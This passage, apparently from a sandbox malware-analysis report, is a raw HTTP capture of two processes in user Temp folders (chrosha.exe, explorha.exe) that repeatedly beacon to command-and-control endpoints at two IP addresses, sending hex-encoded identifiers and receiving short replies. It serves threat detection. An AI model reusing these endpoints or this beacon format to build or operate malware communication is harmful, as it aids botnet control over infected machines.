                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.928988934 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:54.181164980 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1071192.168.2.550925193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.931996107 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:54.177035093 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1072192.168.2.550926193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:54.426840067 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:54.676167011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1073192.168.2.550927193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:54.538641930 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:54.784054041 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1074192.168.2.550929193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.036381006 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.281267881 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1075192.168.2.550928193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.037976980 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.293566942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1076192.168.2.550930193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.539454937 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.788157940 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1077192.168.2.550931193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.651017904 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:55.895720005 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1078192.168.2.550933193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.153461933 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.400955915 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1079192.168.2.550932193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.153932095 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.409738064 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1080192.168.2.550934193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.648047924 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.897547960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1081192.168.2.550935193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:56.773607969 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.020893097 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1082192.168.2.550936193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.257344007 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.501995087 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1083192.168.2.550937193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.277571917 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.539215088 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1084192.168.2.550938193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.753730059 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.001609087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1085192.168.2.550939193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:57.898870945 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.144459009 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1086192.168.2.550940193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.364722967 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:58.607431889 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
